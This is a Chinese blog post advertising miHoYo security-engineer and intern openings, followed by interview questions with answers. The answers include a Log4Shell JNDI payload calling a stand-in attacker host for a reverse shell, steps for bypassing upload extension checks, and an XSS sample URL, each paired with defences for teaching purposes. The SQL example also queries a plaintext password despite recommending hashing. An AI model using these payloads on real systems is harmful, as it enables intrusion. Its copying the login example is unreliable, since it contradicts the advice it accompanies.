正文

游戏公司(原神)的网安岗位招聘米哈游

admin
admin V管理员 /0 评论 /14 阅读
0227
文章最后更新时间2025年02月27日,若文章内容或图片失效,请留言反馈!

米哈游(miHoYo)成立于2011年,以原创IP为核心,开发《原神》《崩坏》系列等高品质游戏,致力于技术研发与文化创新。

下面是最热乎的招聘信息,需要的抓紧无脑的投递把。

招聘岗位
面向对象
工作职责
任职要求
加分项
攻防工程师(2025届)
2024.9-2025.8毕业
1. 渗透测试与风险挖掘2. 行业技术跟踪
1. 熟悉渗透手段与工具(MSF/CS等)2. 脚本编写与漏洞挖掘能力
红蓝对抗经历、英文阅读能力、严重漏洞挖掘经历
安全研发工程师(2025届)
2024.9-2025.8毕业
1. 安全风险自动化开发2. 参与安全项目研发
1. 网络/安全/开发基础2. Web/服务渗透经验
游戏逆向经验、Pwn基础、算法原理了解
【暑期实习】攻防工程师
2025.9-2026.8在校生
1. 渗透测试与风险挖掘2. 行业技术跟踪
1. 熟悉渗透手段与工具(MSF/CS等)2. 脚本编写与漏洞挖掘能力
红蓝对抗经历、英文阅读能力、严重漏洞挖掘经历
【暑期实习】安全研发工程师
2025.9-2026.8在校生
1. 安全风险自动化开发2. 参与安全项目研发
1. 网络/安全/开发基础2. Web/服务渗透经验
游戏逆向经验、Pwn基础、算法原理了解

官方发布链接

  • 网申地址:campus.mihoyo.com

网络安面试题库截止目前已更新51篇,近13w字,里面包含了网安的职业规划、面试准备篇幅、学习方向、求职名单、应届生面试题库、应届生笔试题库、国内外安全企业介绍、以及社会背调等。文末有彩蛋

整理了一下安全开发类在面试的时候可能会被问到的问题,需要的请收藏。

题目1如果发现一个Web应用允许上传任意文件,但后端仅检查文件扩展名,你会如何利用这个漏洞?请描述步骤和防御措施。答案

  • 利用步骤
  1. 上传恶意文件(如.php.jpg),绕过后端扩展名检查;
  2. 通过Web服务器解析漏洞(如Apache解析.php.jpg为PHP文件)或修改MIME类型触发执行;
  3. 通过访问http://target.com/uploads/abc.php.jpg直接执行恶意代码。
  • 防御措施
    • 严格校验文件内容类型(如使用fileinfo扩展);
    • 限制可执行文件类型并禁止上传敏感后缀;
    • 对上传文件重命名(如添加随机前缀)并存储至非Web可访问目录。

    题目2详细说明XSS攻击中的存储型与反射型的区别,并给出修复建议。答案

    • 区别
      • 反射型XSS:攻击代码通过URL参数或表单提交返回到浏览器(如http://example.com/?q=<script>alert(1)</script>);
      • 存储型XSS:攻击代码被永久存储在服务器(如数据库、用户资料页),用户访问时自动触发。
    • 修复建议
      • 对用户输入进行HTML实体转码(如htmlspecialchars);
      • 使用内容安全策略(CSP)限制脚本来源;
      • 对敏感页面(如用户资料)进行输出编码。

    题目3在开发中如何设计一个防止SQL注入的登录模块?请结合代码示例说明。答案

    • 防御方案
      # 使用参数化查询(以Python+SQLAlchemy为例)user = session.query(User).filter_by(username=request.form['username'],                                     password=request.form['password']).first()
      • 避免拼接SQL语句(如"SELECT * FROM users WHERE name='%s'" % username);
      • 使用ORM或预编译语句;
      • 对密码进行哈希存储(如bcrypt)。
      • 关键点

    题目4HTTPS如何防止中间人攻击?请简述其原理及潜在漏洞。答案

    • 原理
      • 通过TLS协议加密通信内容,确保数据完整性和身份验证(证书签发机构验证);
      • 客户端与服务器协商加密算法(如ECDHE-RSA-AES256-GCM-SHA384)。
    • 潜在漏洞
      • 证书伪造(如自签名证书);
      • 中间人攻击(MITM)可通过中间人代理劫持握手过程;
      • 降级攻击(如SSL Stripping)强制使用HTTP。

    题目5如何利用Log4j2漏洞(CVE-2021-44228)进行攻击?请描述攻击链。答案

    • 攻击链
    1. 攻击者构造包含${jndi:ldap://attacker.com/a}的请求;
    2. 应用触发JNDI查找,解析恶意LDAP服务器;
    3. LDAP服务器返回恶意的Java类(如Exploit.class);
    4. 应用加载并执行恶意代码,获取反向Shell或数据泄露。
  • 防御
    • 升级至Log4j2.15+版本,禁用JNDI功能;
    • 配置防火墙拦截LDAP/HTTP协议异常流量。

    题目7如何设计一个高可用的DDoS防御系统?答案

    • 设计思路
    1. 流量清洗:使用专业抗D服务(如Cloudflare、阿里云WAF)过滤异常流量;
    2. 限速策略:在应用层(如Nginx)设置请求频率限制(如limit_req_zone);
    3. CDN加速:利用CDN缓存静态资源并吸收部分攻击流量;
    4. 自动扩容:结合云服务自动扩展后端服务器资源。
  • 潜在挑战
    • 分布式拒绝服务(DDoS)的流量类型多样(如SYN Flood、HTTP Flood)需针对性防御。

    题目8如何看待AI在安全测试中的应用?请举例说明其优缺点。答案

    • 优点
      • 自动化漏洞挖掘:如Ghidra插件自动识别代码中的常见漏洞模式;
      • 威胁情报生成:AI分析海量日志,识别异常行为模式(如异常登录地点)。
    • 缺点
      • 误报率高:AI可能将正常行为误判为攻击(如高频API调用);
      • 依赖数据质量:训练数据不足或偏差会导致防御失效。

    星球介绍

    一个人走的很快,但一群人才能地的更远。吉祥同学学安全这个成立了1年左右,已经有300+的小伙伴了,如果你是网络安全的学生、想转行网络安全行业、需要网安相关的方案、ppt,戳快加入我们吧。系统性的知识库已经有:++++++++


    推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
    宙飒zhousa.om